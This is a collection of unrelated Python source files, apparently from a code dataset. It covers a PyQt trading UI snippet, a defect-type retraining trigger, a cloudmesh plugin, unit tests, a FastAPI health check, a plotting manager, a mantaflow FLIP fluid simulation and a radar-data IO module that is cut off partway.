self.price2_e.setReadOnly(False)
else:
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
def update_cryptos(self,):
tick1 = self.want_crypto_cb.currentText()
tick2 = self.give_crypto_cb.currentText()
self.price1_label.setText(tick1 + '/' + tick2)
self.price2_label.setText(tick2 + '/' + tick1)
| 7,625 | 2,505 |
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
def __init__(self, app_config, start_number=100, accumulated_difference=100):
self.object_saver = ObjectSaver(app_config)
self.start_number = start_number
self.accumulated_difference = accumulated_difference
def remove_triggering_info(self, train_info):
self.object_saver.remove_project_objects(
train_info["project_id"], ["defect_type_trigger_info"])
def get_triggering_info(self, train_info):
return self.object_saver.get_project_object(
train_info["project_id"], "defect_type_trigger_info", using_json=True)
def save_triggering_info(self, trigger_info, train_info):
self.object_saver.put_project_object(
trigger_info, train_info["project_id"],
"defect_type_trigger_info", using_json=True)
def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
trigger_info = self.get_triggering_info(train_info)
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
self.save_triggering_info(trigger_info, train_info)
def should_model_training_be_triggered(self, train_info):
trigger_info = self.get_triggering_info(train_info)
if "num_logs_with_defect_types" not in trigger_info:
trigger_info["num_logs_with_defect_types"] = 0
trigger_info["num_logs_with_defect_types"] += train_info["num_logs_with_defect_types"]
if "num_logs_with_defect_types_since_training" not in trigger_info:
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types_since_training"] += train_info["num_logs_with_defect_types"]
self.save_triggering_info(trigger_info, train_info)
return trigger_info["num_logs_with_defect_types"] >= self.start_number\
and trigger_info["num_logs_with_defect_types_since_training"] >= self.accumulated_difference
| 2,906 | 912 |
from __future__ import print_function
from cloudmesh.shell.command import command
from cloudmesh.shell.command import PluginCommand
from cloudmesh.docopts_example.api.manager import Manager
from cloudmesh.common.console import Console
from cloudmesh.common.util import path_expand
from pprint import pprint
from cloudmesh.common.debug import VERBOSE
class Docopts_exampleCommand(PluginCommand):
# noinspection PyUnusedLocal
@command
def do_docopts_example(self, args, arguments):
"""
::
Usage:
docopts_example --name
docopts_example list
This is an example of how to use docopts.
Arguments:
NAME the users name
Options:
-n specify the name
"""
arguments.NAME = arguments['--name'] or None
VERBOSE(arguments)
m = Manager()
if arguments.NAME:
print("Hello,", m.list(path_expand(arguments.NAME)), "this is an example of docopts")
else:
print("This is an example of docopts") | 1,091 | 297 |
from typing import *
import unittest
import contextlib
import os
import sys
import tempfile
from dvg.dvg import prune_overlapped_paragraphs, expand_file_iter
@contextlib.contextmanager
def back_to_curdir():
curdir = os.getcwd()
try:
yield
finally:
os.chdir(curdir)
def touch(file_name: str):
with open(file_name, "w") as outp:
print("", end="", file=outp)
class DvgUtilFuncsTest(unittest.TestCase):
def test_prune_overlapped_paragraphs(self):
lines = ["a b", "c d", "e f", "b a"]
spps = [
(0.1, 4, (0, 2), lines),
(0.3, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[1]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.2, 4, (1, 3), lines),
(0.1, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.1, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0], spps[2]]
self.assertEqual(actual, expected)
def test_expand_file_iter(self):
with tempfile.TemporaryDirectory() as tempdir:
with back_to_curdir():
os.chdir(tempdir)
file_a = os.path.join("a")
touch(file_a)
file_b = os.path.join("b")
touch(file_b)
os.mkdir("D")
file_Dc = os.path.join("D", "c")
touch(file_Dc)
file_list = list(expand_file_iter(["a"]))
self.assertSequenceEqual(file_list, ["a"])
file_list = list(expand_file_iter(["a", "b"]))
self.assertSequenceEqual(file_list, ["a", "b"])
file_list = list(expand_file_iter(["b", "D/c"]))
self.assertSequenceEqual(file_list, ["b", "D/c"])
file_list = list(expand_file_iter(["*"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b"]))
file_list = list(expand_file_iter(["**"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b", os.path.join("D", "c")]))
sys_stdin = sys.stdin
try:
sys.stdin = ["a", "D/c"]
file_list = list(expand_file_iter(["-"]))
self.assertSequenceEqual(file_list, ["a", "D/c"])
finally:
sys.stdin = sys_stdin
if __name__ == "__main__":
unittest.main()
| 2,790 | 970 |
class NoCongressApiKeyException(Exception):
"""
Thrown when no Congress API key is provided
"""
| 108 | 30 |
from typing import Union
from fastapi import Depends
from fastapi.responses import JSONResponse
from sqlalchemy.orm import Session
from authorization import get_all_roles
from server import app, get_db
from settings import settings
from models import HealthCheck
@app.get('/health', tags=['system'], response_model=HealthCheck, response_model_exclude_none=True)
async def health_check(db: Session = Depends(get_db)):
status = {
'version': settings.server_version,
'server': True,
'database': True
}
try:
db.execute('SELECT 1')
except Exception as err:
status['database'] = False
status['database_error'] = str(err)
return JSONResponse(
status_code=500,
content=status,
)
# return HealthCheck(**status)
return status
| 832 | 231 |
from .factal import *
from .schema import * | 43 | 13 |
# SecretPlots
# Copyright (c) 2019. SecretBiology
#
# Author: Rohit Suratekar
# Organisation: SecretBiology
# Website: https://github.com/secretBiology/SecretPlots
# Licence: MIT License
# Creation: 05/10/19, 7:52 PM
#
# All Location Managers will go here
from SecretPlots.managers._axis import AxisManager
from SecretPlots.managers._object import ObjectManager
from SecretPlots.objects import Data
from SecretPlots.utils import Log
class LocationManager:
def __init__(self, am: AxisManager, om: ObjectManager, log: Log):
self._log = log
self._major = None
self._minor = None
self.om = om
self.start_point = (0, 0)
self.am = am
@property
def width(self):
return self.om.width
@property
def height(self):
return self.om.height
@property
def major_gap(self):
return self.am.major.gap
@property
def minor_gap(self):
return self.am.minor.gap
@property
def plot_type(self):
raise NotImplementedError
@property
def major(self):
if self._major is None:
self._major, self._minor = self.start_point
return self._major
@property
def minor(self):
if self._minor is None:
self._major, self._minor = self.start_point
return self._minor
def validate(self, data: Data):
raise NotImplementedError
def get(self, data: Data):
raise NotImplementedError
| 1,482 | 475 |
#
# This FLIP example combines narrow band flip, 2nd order wall boundary conditions, and
# adaptive time stepping.
#
from manta import *
dim = 3
res = 64
#res = 124
gs = vec3(res,res,res)
if (dim==2):
gs.z=1
s = Solver(name='main', gridSize = gs, dim=dim)
narrowBand = 3
minParticles = pow(2,dim)
saveParts = False
frames = 200
# Adaptive time stepping
s.frameLength = 0.8 # length of one frame (in "world time")
s.cfl = 3.0 # maximal velocity per cell and timestep, 3 is fairly strict
s.timestep = s.frameLength
s.timestepMin = s.frameLength / 4. # time step range
s.timestepMax = s.frameLength * 4.
# prepare grids and particles
flags = s.create(FlagGrid)
phi = s.create(LevelsetGrid)
phiParts = s.create(LevelsetGrid)
phiObs = s.create(LevelsetGrid)
vel = s.create(MACGrid)
velOld = s.create(MACGrid)
velParts = s.create(MACGrid)
#mapWeights= s.create(MACGrid)
pressure = s.create(RealGrid)
fractions = s.create(MACGrid)
tmpVec3 = s.create(VecGrid)
pp = s.create(BasicParticleSystem)
pVel = pp.create(PdataVec3)
mesh = s.create(Mesh)
# acceleration data for particle nbs
pindex = s.create(ParticleIndexSystem)
gpi = s.create(IntGrid)
# scene setup
bWidth=1
flags.initDomain(boundaryWidth=bWidth, phiWalls=phiObs )
fluidVel = 0
fluidSetVel = 0
phi.setConst(999.)
# standing dam
fluidbox1 = Box( parent=s, p0=gs*vec3(0,0,0), p1=gs*vec3(1.0,0.3,1))
phi.join( fluidbox1.computeLevelset() )
fluidbox2 = Box( parent=s, p0=gs*vec3(0.1,0,0), p1=gs*vec3(0.2,0.75,1))
phi.join( fluidbox2.computeLevelset() )
if 1:
sphere = Sphere( parent=s , center=gs*vec3(0.66,0.3,0.5), radius=res*0.2)
phiObs.join( sphere.computeLevelset() )
#obsbox = Box( parent=s, p0=gs*vec3(0.4,0.2,0), p1=gs*vec3(0.7,0.4,1))
#obsbox = Box( parent=s, p0=gs*vec3(0.3,0.2,0), p1=gs*vec3(0.7,0.6,1))
#phiObs.join( obsbox.computeLevelset() )
flags.updateFromLevelset(phi)
phi.subtract( phiObs );
sampleLevelsetWithParticles( phi=phi, flags=flags, parts=pp, discretization=2, randomness=0.05 )
if fluidVel!=0:
# set initial velocity
fluidVel.applyToGrid( grid=vel , value=fluidSetVel )
mapGridToPartsVec3(source=vel, parts=pp, target=pVel )
# also sets boundary flags for phiObs
updateFractions( flags=flags, phiObs=phiObs, fractions=fractions, boundaryWidth=bWidth )
setObstacleFlags(flags=flags, phiObs=phiObs, fractions=fractions)
lastFrame = -1
if 1 and (GUI):
gui = Gui()
gui.show()
#gui.pause()
# save reference any grid, to automatically determine grid size
if saveParts:
pressure.save( 'ref_flipParts_0000.uni' );
#main loop
while s.frame < frames:
maxVel = vel.getMax()
s.adaptTimestep( maxVel )
mantaMsg('\nFrame %i, time-step size %f' % (s.frame, s.timestep))
# FLIP
pp.advectInGrid(flags=flags, vel=vel, integrationMode=IntRK4, deleteInObstacle=False, stopInObstacle=False )
pushOutofObs( parts=pp, flags=flags, phiObs=phiObs )
advectSemiLagrange(flags=flags, vel=vel, grid=phi, order=1) # first order is usually enough
advectSemiLagrange(flags=flags, vel=vel, grid=vel, order=2)
# create level set of particles
gridParticleIndex( parts=pp , flags=flags, indexSys=pindex, index=gpi )
unionParticleLevelset( pp, pindex, flags, gpi, phiParts )
# combine level set of particles with grid level set
phi.addConst(1.); # shrink slightly
phi.join( phiParts );
extrapolateLsSimple(phi=phi, distance=narrowBand+2, inside=True )
extrapolateLsSimple(phi=phi, distance=3 )
phi.setBoundNeumann(0) # make sure no particles are placed at outer boundary, warning - larger values can delete thin sheets at outer walls...
flags.updateFromLevelset(phi)
# combine particles velocities with advected grid velocities
mapPartsToMAC(vel=velParts, flags=flags, velOld=velOld, parts=pp, partVel=pVel, weight=tmpVec3)
extrapolateMACFromWeight( vel=velParts , distance=2, weight=tmpVec3 )
combineGridVel(vel=velParts, weight=tmpVec3 , combineVel=vel, phi=phi, narrowBand=(narrowBand-1), thresh=0)
velOld.copyFrom(vel)
# forces & pressure solve
addGravity(flags=flags, vel=vel, gravity=(0,-0.001,0))
extrapolateMACSimple( flags=flags, vel=vel , distance=2, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
solvePressure(flags=flags, vel=vel, pressure=pressure, phi=phi, fractions=fractions )
extrapolateMACSimple( flags=flags, vel=vel , distance=4, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
if (dim==3):
# mis-use phiParts as temp grid to close the mesh
phiParts.copyFrom(phi)
phiParts.setBound(0.5,0)
phiParts.createMesh(mesh)
# set source grids for resampling, used in adjustNumber!
pVel.setSource( vel, isMAC=True )
adjustNumber( parts=pp, vel=vel, flags=flags, minParticles=1*minParticles, maxParticles=2*minParticles, phi=phi, exclude=phiObs, narrowBand=narrowBand )
flipVelocityUpdate(vel=vel, velOld=velOld, flags=flags, parts=pp, partVel=pVel, flipRatio=0.97 )
s.step()
if (lastFrame!=s.frame):
# generate data for flip03_gen.py surface generation scene
if saveParts:
pp.save( 'flipParts_%04d.uni' % s.frame );
if 0 and (GUI):
gui.screenshot( 'flip06_%04d.png' % s.frame );
#s.printMemInfo()
lastFrame = s.frame;
| 5,279 | 2,175 |
import hashlib
#take a key
key = str(input("KEY>>> "))
#take a message
password = str(input("MESSAGE>>> "))
#function does does something
#make this more complex or something IDK
password = (key + password + key)
hash1 = hashlib.new("sha256")
password = password.encode("utf-8")
print(password)
hash1.update((password))
print(hash1.hexdigest())
| 369 | 136 |
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'
TIME_FORMAT_SECONDS_REGEX = (
'[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')
MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3
SENTINEL_TOLERANCE = 10.
LATLNG_MULTIPLE_DEG = 1e-4
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180
ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
"""Generates glob pattern for pathless name of raw file.
This method rounds the time step to the nearest minute and allows the file
to be either zipped or unzipped.
The pattern generated by this method is meant for input to `glob.glob`.
This method is the "pattern" version of _get_pathless_raw_file_name.
:param unix_time_sec: Valid time.
:return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
"""
return '{0:s}*{1:s}*'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_MINUTES),
UNZIPPED_FILE_EXTENSION
)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
"""Generates pathless name for raw file.
:param unix_time_sec: Valid time.
:param zipped: Boolean flag. If True, will generate name for zipped file.
If False, will generate name for unzipped file.
:return: pathless_raw_file_name: Pathless name for raw file.
"""
if zipped:
return '{0:s}{1:s}{2:s}'.format(
time_conversion.unix_sec_to_string(
unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION,
ZIPPED_FILE_EXTENSION
)
return '{0:s}{1:s}'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION
)
def _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name, sentinel_values):
"""Removes sentinel values from sparse grid.
:param sparse_grid_table: pandas DataFrame with columns produced by
`read_data_from_sparse_grid_file`.
:param field_name: Name of radar field in GewitterGefahr format.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: sparse_grid_table: Same as input, except that rows with a sentinel
value are removed.
"""
num_rows = len(sparse_grid_table.index)
sentinel_flags = numpy.full(num_rows, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
sparse_grid_table[field_name].values, this_sentinel_value,
atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
return sparse_grid_table.drop(
sparse_grid_table.index[sentinel_indices], axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
"""Removes sentinel values from full grid.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with radar field.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: field_matrix: Same as input, except that sentinel values are
replaced with NaN.
"""
num_grid_rows = field_matrix.shape[0]
num_grid_columns = field_matrix.shape[1]
num_grid_points = num_grid_rows * num_grid_columns
field_matrix = numpy.reshape(field_matrix, num_grid_points)
sentinel_flags = numpy.full(num_grid_points, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
field_matrix, this_sentinel_value, atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
field_matrix[sentinel_indices] = numpy.nan
return numpy.reshape(field_matrix, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
"""Generates relative path for raw files.
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param height_m_asl: Radar height (metres above sea level).
:return: relative_directory_name: Relative path for raw files.
"""
if field_name == radar_utils.REFL_NAME:
radar_utils.check_heights(
data_source=data_source, heights_m_asl=numpy.array([height_m_asl]),
field_name=radar_utils.REFL_NAME)
else:
height_m_asl = radar_utils.get_valid_heights(
data_source=data_source, field_name=field_name)[0]
return '{0:s}/{1:05.2f}'.format(
radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=data_source),
float(height_m_asl) * METRES_TO_KM
)
def find_raw_file(
unix_time_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, raise_error_if_missing=True):
"""Finds raw file.
File should contain one field at one time step (e.g., MESH at 123502 UTC,
reflectivity at 500 m above sea level and 123502 UTC).
:param unix_time_sec: Valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and file is missing,
this method will raise an error. If False and file is missing, will
return *expected* path to raw file.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if raise_error_if_missing = True and file is missing.
"""
# Error-checking.
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(raise_error_if_missing)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, height_m_asl=height_m_asl,
data_source=data_source)
directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name
)
pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
pathless_file_name = _get_pathless_raw_file_name(
unix_time_sec, zipped=False)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
raise ValueError(
'Cannot find raw file. Expected at: "{0:s}"'.format(raw_file_name)
)
return raw_file_name
def raw_file_name_to_time(raw_file_name):
"""Parses time from file name.
:param raw_file_name: Path to raw file.
:return: unix_time_sec: Valid time.
"""
error_checking.assert_is_string(raw_file_name)
_, time_string = os.path.split(raw_file_name)
time_string = time_string.replace(ZIPPED_FILE_EXTENSION, '').replace(
UNZIPPED_FILE_EXTENSION, '')
return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
desired_time_unix_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, max_time_offset_sec=None,
raise_error_if_missing=False):
"""Finds raw file at inexact time.
If you know the exact valid time, use `find_raw_file`.
:param desired_time_unix_sec: Desired valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Field name in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param max_time_offset_sec: Maximum offset between actual and desired valid
time.
For example, if `desired_time_unix_sec` is 162933 UTC 5 Jan 2018 and
`max_time_offset_sec` = 60, this method will look for az-shear at valid
times from 162833...163033 UTC 5 Jan 2018.
If None, this defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC` for
azimuthal-shear fields and `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC` for
all other fields.
:param raise_error_if_missing: Boolean flag. If no file is found and
raise_error_if_missing = True, this method will error out. If no file
is found and raise_error_if_missing = False, will return None.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if no file is found and raise_error_if_missing = True.
"""
# Error-checking.
error_checking.assert_is_integer(desired_time_unix_sec)
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_boolean(raise_error_if_missing)
radar_utils.check_field_name(field_name)
if max_time_offset_sec is None:
if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
else:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC
error_checking.assert_is_integer(max_time_offset_sec)
error_checking.assert_is_greater(max_time_offset_sec, 0)
first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec - max_time_offset_sec),
MINUTES_TO_SECONDS)))
last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec + max_time_offset_sec),
MINUTES_TO_SECONDS)))
allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=first_allowed_minute_unix_sec,
end_time_unix_sec=last_allowed_minute_unix_sec,
time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, data_source=data_source,
height_m_asl=height_m_asl)
raw_file_names = []
for this_time_unix_sec in allowed_minutes_unix_sec:
this_pathless_file_pattern = _get_pathless_raw_file_pattern(
this_time_unix_sec)
this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name, this_pathless_file_pattern
)
raw_file_names += glob.glob(this_file_pattern)
file_times_unix_sec = []
for this_raw_file_name in raw_file_names:
file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))
if len(file_times_unix_sec):
file_times_unix_sec = numpy.array(file_times_unix_sec)
time_differences_sec = numpy.absolute(
file_times_unix_sec - desired_time_unix_sec)
nearest_index = numpy.argmin(time_differences_sec)
min_time_diff_sec = time_differences_sec[nearest_index]
else:
min_time_diff_sec = numpy.inf
if min_time_diff_sec > max_time_offset_sec:
if raise_error_if_missing:
desired_time_string = time_conversion.unix_sec_to_string(
desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
error_string = (
'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
).format(field_name, max_time_offset_sec, desired_time_string)
raise ValueError(error_string)
return None
return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
spc_date_string, field_name, data_source, top_directory_name,
height_m_asl=None, raise_error_if_missing=True):
"""Finds raw files for one field and one SPC date.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and no files are
found, will raise error.
:return: raw_file_names: 1-D list of paths to raw files.
:raises: ValueError: if raise_error_if_missing = True and no files are
found.
"""
error_checking.assert_is_boolean(raise_error_if_missing)
example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
spc_date_string)
example_file_name = find_raw_file(
unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
field_name=field_name, data_source=data_source,
top_directory_name=top_directory_name, height_m_asl=height_m_asl,
raise_error_if_missing=False)
example_directory_name, example_pathless_file_name = os.path.split(
example_file_name)
example_time_string = time_conversion.unix_sec_to_string(
example_time_unix_sec, TIME_FORMAT_SECONDS)
pathless_file_pattern = example_pathless_file_name.replace(
example_time_string, TIME_FORMAT_SECONDS_REGEX)
pathless_file_pattern = pathless_file_pattern.replace(
ZIPPED_FILE_EXTENSION, '*')
raw_file_pattern = '{0:s}/{1:s}'.format(
example_directory_name, pathless_file_pattern)
raw_file_names = glob.glob(raw_file_pattern)
if raise_error_if_missing and not raw_file_names:
error_string = (
'Could not find any files with the following pattern: {0:s}'
).format(raw_file_pattern)
raise ValueError(error_string)
return raw_file_names
def find_many_raw_files(
desired_times_unix_sec, spc_date_strings, data_source, field_names,
top_directory_name, reflectivity_heights_m_asl=None,
max_time_offset_for_az_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
max_time_offset_for_non_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
"""Finds raw file for each field/height pair and time step.
N = number of input times
T = number of unique input times
F = number of field/height pairs
:param desired_times_unix_sec: length-N numpy array with desired valid
times.
:param spc_date_strings: length-N list of corresponding SPC dates (format
"yyyymmdd").
:param data_source: Data source ("myrorss" or "mrms").
:param field_names: 1-D list of field names.
:param top_directory_name: Name of top-level directory with radar data from
the given source.
:param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
sea level) for the field "reflectivity_dbz". If "reflectivity_dbz" is
not in `field_names`, leave this as None.
:param max_time_offset_for_az_shear_sec: Max time offset (between desired
and actual valid time) for azimuthal-shear fields.
:param max_time_offset_for_non_shear_sec: Max time offset (between desired
and actual valid time) for non-azimuthal-shear fields.
:return: file_dictionary: Dictionary with the following keys.
file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
raw files.
file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
valid times.
file_dictionary['spc_date_strings_for_unique_times']: length-T numpy array
of corresponding SPC dates.
file_dictionary['field_name_by_pair']: length-F list of field names.
file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
(metres above sea level).
"""
field_name_by_pair, height_by_pair_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
field_names=field_names, data_source=data_source,
refl_heights_m_asl=reflectivity_heights_m_asl)
)
num_fields = len(field_name_by_pair)
error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
error_checking.assert_is_numpy_array(
desired_times_unix_sec, num_dimensions=1)
num_times = len(desired_times_unix_sec)
error_checking.assert_is_string_list(spc_date_strings)
error_checking.assert_is_numpy_array(
numpy.array(spc_date_strings),
exact_dimensions=numpy.array([num_times]))
spc_dates_unix_sec = numpy.array(
[time_conversion.spc_date_string_to_unix_sec(s)
for s in spc_date_strings])
time_matrix = numpy.hstack((
numpy.reshape(desired_times_unix_sec, (num_times, 1)),
numpy.reshape(spc_dates_unix_sec, (num_times, 1))
))
unique_time_matrix = numpy.vstack(
{tuple(this_row) for this_row in time_matrix}
).astype(int)
unique_times_unix_sec = unique_time_matrix[:, 0]
spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]
sort_indices = numpy.argsort(unique_times_unix_sec)
unique_times_unix_sec = unique_times_unix_sec[sort_indices]
spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
sort_indices]
num_unique_times = len(unique_times_unix_sec)
radar_file_name_matrix = numpy.full(
(num_unique_times, num_fields), '', dtype=object)
for i in range(num_unique_times):
this_spc_date_string = time_conversion.time_to_spc_date_string(
spc_dates_at_unique_times_unix_sec[i])
for j in range(num_fields):
if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
this_max_time_offset_sec = max_time_offset_for_az_shear_sec
this_raise_error_flag = False
else:
this_max_time_offset_sec = max_time_offset_for_non_shear_sec
this_raise_error_flag = True
if this_max_time_offset_sec == 0:
radar_file_name_matrix[i, j] = find_raw_file(
unix_time_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
